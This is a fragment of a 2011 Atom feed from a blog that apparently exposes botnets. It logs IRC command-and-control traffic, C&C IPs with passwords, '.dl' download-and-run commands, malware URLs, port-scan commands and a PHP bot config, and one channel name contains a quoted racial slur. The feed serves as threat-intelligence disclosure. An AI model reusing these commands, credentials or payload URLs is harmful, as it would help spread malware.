src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6053086175416298741</id><published>2011-12-05T20:42:00.001+01:00</published><updated>2011-12-05T20:47:58.691+01:00</updated><title type='text'>46.249.56.213(ngrBot hosted in Netherlands  Amsterdam  Serverius Holding B.v)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;46.249.56.213 8811 PASS ngrBot&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}ihsboxr&lt;br /&gt;USER ihsboxr 0 0 :ihsboxr&lt;br /&gt;PONG :C03D3650&lt;br /&gt;JOIN #paradise klash&lt;br /&gt;&lt;br /&gt;Now talking in #paradise&lt;br /&gt;Topic On: [ #paradise ] [ .dl http://dc460.4shared.com/download/Vev8KBwQ/insomnia.exe?tsid=20111205-151346-2b5ec481 ]&lt;br /&gt;Topic By: [ WILLY ]&lt;br /&gt;Modes On: [ #paradise ] [ +smntu ]&lt;br /&gt;Nick: WILLY is now known as [n{US|VI-64a}ndksjax]&lt;br /&gt;&lt;br /&gt;Topic: n{US|VI-64a}ndksjax sets topic [.dl http://dc465.4shared.com/download/Co9oUD6m/113bexe.exe?tsid=20111205-194436-d93b71b3]&lt;br /&gt;@(n{US|VI-64a}ndksjax) .rc&lt;br /&gt;@(n{US|VI-64a}ndksjax) .rc&lt;br /&gt;&lt;br /&gt;Just in case insomnia.exe is deleted from 4shared here another link:&lt;br /&gt;&lt;a href="http://8d220988.urlbeat.net/" target="_blank"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6053086175416298741?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6053086175416298741/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/4624956213ngrbot-hosted-in-netherlands.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6053086175416298741'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6053086175416298741'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/4624956213ngrbot-hosted-in-netherlands.html' title='46.249.56.213(ngrBot hosted in Netherlands  Amsterdam  Serverius Holding B.v)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7220747645823444866</id><published>2011-12-05T00:39:00.000+01:00</published><updated>2011-12-05T00:39:42.529+01:00</updated><title type='text'>curado.ru(ngrBot hosted in Germany Berlin Intergenia Ag)</title><content type='html'>Remote Host Port Number&lt;br /&gt;188.138.0.84 1686 PASS koka25&lt;br /&gt;199.15.234.7 80&lt;br /&gt;77.74.199.61 80&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}ezhvyeo&lt;br /&gt;USER ezhvyeo 0 0 :ezhvyeo&lt;br /&gt;JOIN #soaa koka25&lt;br /&gt;JOIN #US&lt;br /&gt;PRIVMSG #soaa :[d="http://77.74.199.61/111222.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0&lt;br /&gt;&lt;br /&gt;    * The data identified by the following URLs was then requested from the remote web server:&lt;br /&gt;          o http://api.wipmania.com/&lt;br /&gt;          o http://77.74.199.61/111222.exe&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/188.138.0.84&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7220747645823444866?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7220747645823444866/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/curadorungrbot-hosted-in-germany-berlin.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7220747645823444866'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7220747645823444866'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/curadorungrbot-hosted-in-germany-berlin.html' title='curado.ru(ngrBot hosted in Germany Berlin Intergenia Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6212884245993154638</id><published>2011-12-02T13:48:00.003+01:00</published><updated>2011-12-02T23:19:01.595+01:00</updated><title type='text'>97.74.192.231(ngrBot hosted in United States  Godaddy.com Inc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;97.74.192.231 8000 PASS passwd&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}cmeoubk&lt;br /&gt;USER cmeoubk 0 0 :cmeoubk&lt;br /&gt;JOIN #b0ts ngrBot&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/97.74.192.231&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6212884245993154638?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6212884245993154638/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/9774192231ngrbot-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6212884245993154638'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6212884245993154638'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/9774192231ngrbot-hosted-in.html' title='97.74.192.231(ngrBot hosted in United States  Godaddy.com Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1606578690379706816</id><published>2011-12-02T12:49:00.000+01:00</published><updated>2011-12-02T12:49:10.236+01:00</updated><title type='text'>178.63.193.161(irc botnet hosted in Germany  Gunzenhausen  Hetzner Online Ag)</title><content type='html'>Remote Host Port Number&lt;br /&gt;178.63.193.161 6667&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;NICK New{US-XP-x86}1062264&lt;br /&gt;USER 1062264 "" "1062264" :1062264&lt;br /&gt;MODE New{US-XP-x86}1062264 +iMm&lt;br /&gt;JOIN #Boss&lt;br /&gt;PONG :irc.foonet.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/178.63.193.161&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1606578690379706816?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1606578690379706816/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/17863193161irc-botnet-hosted-in-germany.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1606578690379706816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1606578690379706816'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/17863193161irc-botnet-hosted-in-germany.html' title='178.63.193.161(irc botnet hosted in Germany  Gunzenhausen  Hetzner Online Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3083464206068471830</id><published>2011-11-30T20:29:00.000+01:00</published><updated>2011-11-30T20:29:05.970+01:00</updated><title type='text'>208.67.252.82(irc botnet hosted in United Kingdom  Pelican Helpdesk Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;208.67.252.82 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|00209]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-4688 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|00209] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/208.67.252.82&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3083464206068471830?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3083464206068471830/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/2086725282irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3083464206068471830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3083464206068471830'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/2086725282irc-botnet-hosted-in-united.html' title='208.67.252.82(irc botnet hosted in United Kingdom  Pelican Helpdesk Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2733368184070468201</id><published>2011-11-29T19:06:00.000+01:00</published><updated>2011-11-29T19:06:41.859+01:00</updated><title type='text'>tretr23.com(JACK LOADER hosted in Romania  Iasi  Prime Telecom Srl)</title><content type='html'>Another http malware spreading around&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-t6rkMdlz93g/TtUeEiOrvjI/AAAAAAAAAIw/NkP4tcflLlM/s1600/JACK+LOADER.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-t6rkMdlz93g/TtUeEiOrvjI/AAAAAAAAAIw/NkP4tcflLlM/s320/JACK+LOADER.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Panel:http://188.247.135.32/signin.php&lt;br /&gt;&lt;br /&gt;Network Activity:&lt;br /&gt;&lt;br /&gt;Host Name IP Address&lt;br /&gt;tretr23.com &lt;br /&gt;tretr23.com 188.247.135.32&lt;br /&gt;Download URLs&lt;br /&gt;http://188.247.135.32/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D07DB5860B2E69F2DCE5CA8B5FF9F6DADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&amp;v=2&amp;t=0,4527399 (tretr23.com)&lt;br /&gt;Outgoing connection to remote server: tretr23.com TCP port 80&lt;br /&gt;&lt;br /&gt;Host Name IP Address&lt;br /&gt;ytreytre.com &lt;br /&gt;ytreytre.com 94.63.240.235&lt;br /&gt;Download URLs&lt;br /&gt;http://94.63.240.235/temp/3431.exe?t=0,4103815 (ytreytre.com)&lt;br /&gt;Outgoing connection to remote server: ytreytre.com TCP port 80&lt;br /&gt;&lt;br /&gt;Host Name IP Address&lt;br /&gt;tretr23.com &lt;br /&gt;tretr23.com 188.247.135.32&lt;br /&gt;Download URLs&lt;br /&gt;http://188.247.135.32/sn.php?c=908E72969A0A2B8310FA89A6D7AD30F30FAFA09590DF48823B0A0440F15AC399317E2ACCA79B6606350F95F93B056B7127DFFA129EEBCAEFB286A3D4047CB72AC78C1168F6F56CF34A70E59FA34D28F70BFC003D7806787EF741EA8FF01BB5CD8FD7707AACB6CE6E9A299215C6C647DD17E09CB3632482A5762F92FD87313E800800D17D2D1C5D98B380F4A69850EA6A&amp;t=0,5958063 (tretr23.com)&lt;br /&gt;Outgoing connection to remote server: tretr23.com TCP port 80&lt;br /&gt;&lt;br /&gt;exe files:&lt;br /&gt;http://vetvetcom.com/tr9.txt&lt;br /&gt;http://94.63.240.235/temp/3431.exe&lt;br /&gt;http://29315285.tubeviral.com&lt;br /&gt;http://b774fafb.theseforums.com&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/188.247.135.32&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2733368184070468201?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2733368184070468201/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/tretr23comjack-loader-hosted-in-romania.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2733368184070468201'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2733368184070468201'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/tretr23comjack-loader-hosted-in-romania.html' title='tretr23.com(JACK LOADER hosted in Romania  Iasi  Prime Telecom Srl)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-t6rkMdlz93g/TtUeEiOrvjI/AAAAAAAAAIw/NkP4tcflLlM/s72-c/JACK+LOADER.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3218250110152549296</id><published>2011-11-29T17:49:00.000+01:00</published><updated>2011-11-29T17:49:44.213+01:00</updated><title type='text'>negro001.com(ngrBot hosted in Seychelles  Ideal Solution Ltd)</title><content type='html'>Resolved : [negro001.com] To [193.107.16.131]&lt;br /&gt;Resolved : [negro001.com] To [92.241.165.152]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;92.241.165.152 8782 ircd here&lt;br /&gt;193.107.16.131  8782 ircd here&lt;br /&gt;&lt;br /&gt;NICK [USA|635435]&lt;br /&gt;USER 8770 "" "lol" :8770&lt;br /&gt;JOIN #moo&lt;br /&gt;PONG :Threat-Expert.net&lt;br /&gt;&lt;br /&gt;NICK {iNF-00-USA-XP-COMP-7188}&lt;br /&gt;JOIN #hold nigger&lt;br /&gt;PONG Threat-Expert.net&lt;br /&gt;USER blaze * 0 :COMP&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/193.107.16.131&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3218250110152549296?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3218250110152549296/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/negro001comngrbot-hosted-in-seychelles.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3218250110152549296'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3218250110152549296'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/negro001comngrbot-hosted-in-seychelles.html' title='negro001.com(ngrBot hosted in Seychelles  Ideal Solution Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7535452148230266958</id><published>2011-11-28T23:45:00.000+01:00</published><updated>2011-11-28T23:45:18.575+01:00</updated><title type='text'>208.67.252.118(irc botnet hosted in United States Buckshot Enterprises Llc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;208.67.252.118 2345&lt;br /&gt;&lt;br /&gt;NICK [USA|00|P|65160]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-2443 * 0 :COMPUTERNAME&lt;br /&gt;MODE [USA|00|P|65160] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/208.67.252.118&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7535452148230266958?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7535452148230266958/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/20867252118irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7535452148230266958'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7535452148230266958'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/20867252118irc-botnet-hosted-in-united.html' title='208.67.252.118(irc botnet hosted in United States Buckshot Enterprises Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-7785353686449078234</id><published>2011-11-27T22:06:00.001+01:00</published><updated>2011-11-28T23:05:50.862+01:00</updated><title type='text'>www.facebookvideocentral.com(irc botnet hosted in Turkey  Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)</title><content type='html'>Remote Host Port Number&lt;br /&gt;213.202.225.40 80&lt;br /&gt;213.202.225.48 80&lt;br /&gt;74.206.242.164 80&lt;br /&gt;46.45.164.166 81 IRCD HERE&lt;br /&gt;&lt;br /&gt;NICK [N00_USA_XP_8072956]&lt;br /&gt;JOIN #c&lt;br /&gt;MODE [00_USA_XP_9406831] -ix&lt;br /&gt;USER SP2-351 * 0 :COMPUTERNAME&lt;br /&gt;PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe&lt;br /&gt;PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads.&lt;br /&gt;PRIVMSG #c :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 15 threads.&lt;br /&gt;PRIVMSG #c :scan; Sequential Port Scan started on 192.168.80.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.&lt;br /&gt;PRIVMSG #c :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.&lt;br /&gt;NICK [00_USA_XP_9406831]&lt;br /&gt;USER SP2-307 * 0 :COMPUTERNAME&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;Remote Host Port Number&lt;br /&gt;213.202.225.40 80&lt;br /&gt;213.202.225.48 80&lt;br /&gt;46.45.164.164 80&lt;br /&gt;74.206.242.164 80&lt;br /&gt;46.45.164.174 81 ircd here&lt;br /&gt;&lt;br /&gt;NICK [00_USA_XP_6506493]&lt;br /&gt;MODE #t1 -ix&lt;br /&gt;PRIVMSG #t1 :download; File download: 152.0KB to: c:\syncapp.exe @ 4.9KB/sec.&lt;br /&gt;PRIVMSG #t1 :download; Created process: "c:\syncapp.exe", PID:&lt;br /&gt;USER SP2-176 * 0 :COMPUTERNAME&lt;br /&gt;MODE [00_USA_XP_6506493] -ix&lt;br /&gt;JOIN #t1&lt;br /&gt;&lt;br /&gt;    * The data identified by the following URLs was then requested from the remote web server:&lt;br /&gt;          o http://chillly.ch.ohost.de/aze/azenv.php&lt;br /&gt;          o http://bentseather.be.funpic.de/azenv.php&lt;br /&gt;          o http://46.45.164.164/cc.exe&lt;br /&gt;          o http://www.pr0.net/deny2/azenv.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/46.45.164.166&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7785353686449078234?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/7785353686449078234/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/wwwfacebookvideocentralcomirc-botnet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7785353686449078234'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/7785353686449078234'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/wwwfacebookvideocentralcomirc-botnet.html' title='www.facebookvideocentral.com(irc botnet hosted in Turkey  Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8676305224347661664</id><published>2011-11-26T23:47:00.002+01:00</published><updated>2011-11-26T23:47:55.307+01:00</updated><title type='text'>188.190.96.148(irc botnet hosted in Ukraine  Infium Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;188.190.96.148 8087 PASS bich99&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}mlqlmaj&lt;br /&gt;USER mlqlmaj 0 0 :mlqlmaj&lt;br /&gt;JOIN #cash bich99&lt;br /&gt;JOIN #US&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/188.190.96.148&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8676305224347661664?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8676305224347661664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/18819096148irc-botnet-hosted-in-ukraine.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8676305224347661664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8676305224347661664'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/18819096148irc-botnet-hosted-in-ukraine.html' title='188.190.96.148(irc botnet hosted in Ukraine  Infium Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8091525818406993048</id><published>2011-11-26T23:44:00.002+01:00</published><updated>2011-11-26T23:44:39.459+01:00</updated><title type='text'>178.63.199.34(3vbot hosted in Germany  Gunzenhausen  Hetzner Online Ag)</title><content type='html'>Remote Host Port Number&lt;br /&gt;178.63.199.34 6667&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;NICK New{US-XP-x86}4687226&lt;br /&gt;USER 4687226 "" "4687226" :4687226&lt;br /&gt;MODE New{US-XP-x86}4687226 +iMm&lt;br /&gt;JOIN #|3vbot|#&lt;br /&gt;PONG :irc.priv8net.com&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/178.63.199.34&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8091525818406993048?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8091525818406993048/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/11/17863199343vbot-hosted-in-germany.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8091525818406993048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8091525818406993048'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/11/17863199343vbot-hosted-in-germany.html' title='178.63.199.34(3vbot hosted in Germany  Gunzenhausen  Hetzner Online Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2625410595925757665</id><published>2011-11-26T22:57:00.000+01:00</published><updated>2011-11-26T22:57:33.488+01:00</updated><title type='text'>java.alb-team.com(linux bots hosted in United States  Ft. Lee  Righthosting.com)</title><content type='html'>albanian lamers hosting rfi bots for ddos&lt;br /&gt;&lt;br /&gt;var $config = array("server"=&gt;"java.alb-team.com", &lt;br /&gt;                     "port"=&gt;4242, &lt;br /&gt;                     "pass"=&gt;"", //&lt;br /&gt;                     "prefix"=&gt;"", &lt;br /&gt;                     "maxrand"=&gt;7, &lt;br /&gt;                     "chan"=&gt;"#bote", &lt;br /&gt;                     "key"=&gt;"142536", //&lt;br /&gt;                     "modes"=&gt;"-x+i", &lt;br /&gt;                     "password"=&gt;"bomp",  //&lt;br /&gt;                     "trigger"=&gt;"!say@", &lt;br /&gt;                     "hostauth"=&gt;"*" // * &lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/66.78.3.76&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2625410595925757665?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 